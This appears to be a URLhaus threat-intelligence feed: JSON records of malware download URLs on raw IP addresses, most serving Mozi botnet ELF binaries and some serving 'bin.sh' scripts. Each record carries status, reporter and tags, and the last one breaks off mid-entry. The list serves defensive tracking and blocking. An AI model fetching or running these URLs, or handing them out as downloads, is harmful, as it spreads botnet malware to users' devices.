+{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://58.249.82.105:57042/Mozi.m","url_status":"online","host":"58.249.82.105","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://59.99.188.73:38035/Mozi.m","url_status":"offline","host":"59.99.188.73","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://42.228.238.118:33540/Mozi.m","url_status":"online","host":"42.228.238.118","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://42.238.236.187:51947/Mozi.m","url_status":"online","host":"42.238.236.187","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://186.33.123.28:36915/Mozi.m","url_status":"online","host":"186.33.123.28","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://182.116.84.95:38865/Mozi.m","url_status":"online","host":"182.116.84.95","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://103.217.123.186:55480/Mozi.m","url_status":"offline","host":"103.217.123.186","date_added":"2021-01-14 18:04:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://182.136.98.81:51996/Mozi.m","url_status":"offline","host":"182.136.98.81","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://125.47.250.69:36042/Mozi.m","url_status":"offline","host":"125.47.250.69","date_added":"2021-01-14 18:04:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://222.137.96.31:34350/Mozi.m","url_status":"offline","host":"222.137.96.31","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://223.130.29.204:53587/Mozi.m","url_status":"offline","host":"223.130.29.204","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://61.52.28.142:53444/Mozi.m","url_status":"online","host":"61.52.28.142","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://120.85.254.107:58653/Mozi.m","url_status":"online","host":"120.85.254.107","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://202.164.139.218:50579/Mozi.m","url_status":"offline","host":"202.164.139.218","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://114.199.216.11:3553/Mozi.m","url_status":"offline","host":"114.199.216.11","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://112.241.208.20:35288/Mozi.a","url_status":"online","host":"112.241.208.20","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://186.33.104.10:46429/Mozi.m","url_status":"online","host":"186.33.104.10","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://59.96.37.179:44575/Mozi.m","url_status":"offline","host":"59.96.37.179","date_added":"2021-01-14 18:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://125.42.236.165:43245/Mozi.m","url_status":"online","host":"125.42.236.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://117.242.211.165:50444/Mozi.m","url_status":"offline","host":"117.242.211.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://115.63.134.203:51318/Mozi.m","url_status":"online","host":"115.63.134.203","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://123.4.89.190:46221/Mozi.m","url_status":"online","host":"123.4.89.190","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://123.9.108.157:51430/Mozi.m","url_status":"online","host":"123.9.108.157","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://115.48.160.11:52028/Mozi.m","url_status":"online","host":"115.48.160.11","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://125.44.61.35:48291/Mozi.a","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://202.164.138.170:39613/Mozi.m","url_status":"offline","host":"202.164.138.170","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://219.154.108.170:34201/bin.sh","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://220.135.95.248:47095/Mozi.a","url_status":"online","host":"220.135.95.248","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://42.239.154.85:42004/Mozi.m","url_status":"online","host":"42.239.154.85","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://27.203.185.42:52058/Mozi.m","url_status":"online","host":"27.203.185.42","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://39.80.186.173:45432/Mozi.m","url_status":"online","host":"39.80.186.173","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://61.52.34.132:49891/Mozi.m","url_status":"online","host":"61.52.34.132","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://61.54.41.216:34334/Mozi.m","url_status":"online","host":"61.54.41.216","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://186.33.104.202:42886/Mozi.m","url_status":"online","host":"186.33.104.202","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://189.51.107.141:47096/Mozi.m","url_status":"offline","host":"189.51.107.141","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://182.126.81.19:48214/Mozi.a","url_status":"online","host":"182.126.81.19","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://186.33.122.192:40478/Mozi.m","url_status":"offline","host":"186.33.122.192","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://182.121.200.78:37771/Mozi.m","url_status":"online","host":"182.121.200.78","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://182.124.24.207:35513/Mozi.m","url_status":"online","host":"182.124.24.207","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://125.43.32.14:53382/Mozi.m","url_status":"online","host":"125.43.32.14","date_added":"2021-01-14 17:51:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://115.55.129.18:50336/Mozi.m","url_status":"online","host":"115.55.129.18","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://116.73.59.171:34233/Mozi.a","url_status":"offline","host":"116.73.59.171","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://117.208.132.85:38392/Mozi.m","url_status":"online","host":"117.208.132.85","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://117.222.173.218:52654/Mozi.m","url_status":"offline","host":"117.222.173.218","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://117.247.200.9:60203/Mozi.m","url_status":"offline","host":"117.247.200.9","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://120.85.187.191:48091/Mozi.a","url_status":"online","host":"120.85.187.191","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://111.241.105.88:40783/Mozi.m","url_status":"offline","host":"111.241.105.88","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://113.88.36.206:52015/Mozi.m","url_status":"online","host":"113.88.36.206","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://59.99.143.251:42987/Mozi.m","url_status":"offline","host":"59.99.143.251","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://59.94.180.106:53388/Mozi.m","url_status":"offline","host":"59.94.180.106","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://36.224.231.40:44124/Mozi.a","url_status":"online","host":"36.224.231.40","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://223.212.211.103:33802/Mozi.m","url_status":"online","host":"223.212.211.103","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://59.99.95.124:43806/Mozi.m","url_status":"offline","host":"59.99.95.124","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://59.97.169.13:52278/Mozi.m","url_status":"offline","host":"59.97.169.13","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://39.64.134.162:41202/Mozi.m","url_status":"online","host":"39.64.134.162","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://182.117.84.206:35756/Mozi.m","url_status":"online","host":"182.117.84.206","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://186.33.123.61:40569/Mozi.m","url_status":"online","host":"186.33.123.61","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://182.112.20.174:47645/Mozi.m","url_status":"online","host":"182.112.20.174","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://123.13.77.167:40023/Mozi.m","url_status":"online","host":"123.13.77.167","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://115.48.204.10:53402/Mozi.m","url_status":"online","host":"115.48.204.10","date_added":"2021-01-14 17:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://175.214.73.205:36316/bin.sh","url_status":"offline","host":"175.214.73.205","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://117.248.61.75:48105/bin.sh","url_status":"offline","host":"117.248.61.75","date_added":"2021-01-14 17:28:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://42.231.245.237:40017/Mozi.m","url_status":"online","host":"42.231.245.237","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://59.99.45.199:41906/Mozi.m","url_status":"offline","host":"59.99.45.199","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://42.237.48.61:38607/Mozi.m","url_status":"online","host":"42.237.48.61","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://59.93.23.63:59331/Mozi.m","url_status":"offline","host":"59.93.23.63","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://182.126.118.45:53932/Mozi.m","url_status":"online","host":"182.126.118.45","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://42.230.152.22:58385/Mozi.m","url_status":"online","host":"42.230.152.22","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://186.33.105.12:57010/Mozi.m","url_status":"online","host":"186.33.105.12","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://222.137.33.111:59715/Mozi.m","url_status":"online","host":"222.137.33.111","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://42.231.120.221:57052/Mozi.m","url_status":"online","host":"42.231.120.221","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://182.117.11.37:60550/Mozi.m","url_status":"online","host":"182.117.11.37","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://186.33.104.144:39684/Mozi.m","url_status":"offline","host":"186.33.104.144","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://122.188.41.69:43593/Mozi.a","url_status":"online","host":"122.188.41.69","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://125.42.207.154:36066/Mozi.m","url_status":"offline","host":"125.42.207.154","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://115.230.82.41:35006/Mozi.m","url_status":"online","host":"115.230.82.41","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://113.90.177.157:38184/Mozi.m","url_status":"online","host":"113.90.177.157","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://112.228.183.24:59027/Mozi.m","url_status":"online","host":"112.228.183.24","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://117.192.226.105:50639/Mozi.m","url_status":"offline","host":"117.192.226.105","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://115.54.242.73:33534/Mozi.a","url_status":"online","host":"115.54.242.73","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://115.54.208.19:36316/Mozi.m","url_status":"online","host":"115.54.208.19","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://115.97.18.154:47120/Mozi.m","url_status":"offline","host":"115.97.18.154","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://117.213.42.231:46287/Mozi.m","url_status":"offline","host":"117.213.42.231","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://42.236.149.218:39536/bin.sh","url_status":"online","host":"42.236.149.218","date_added":"2021-01-14 17:14:05 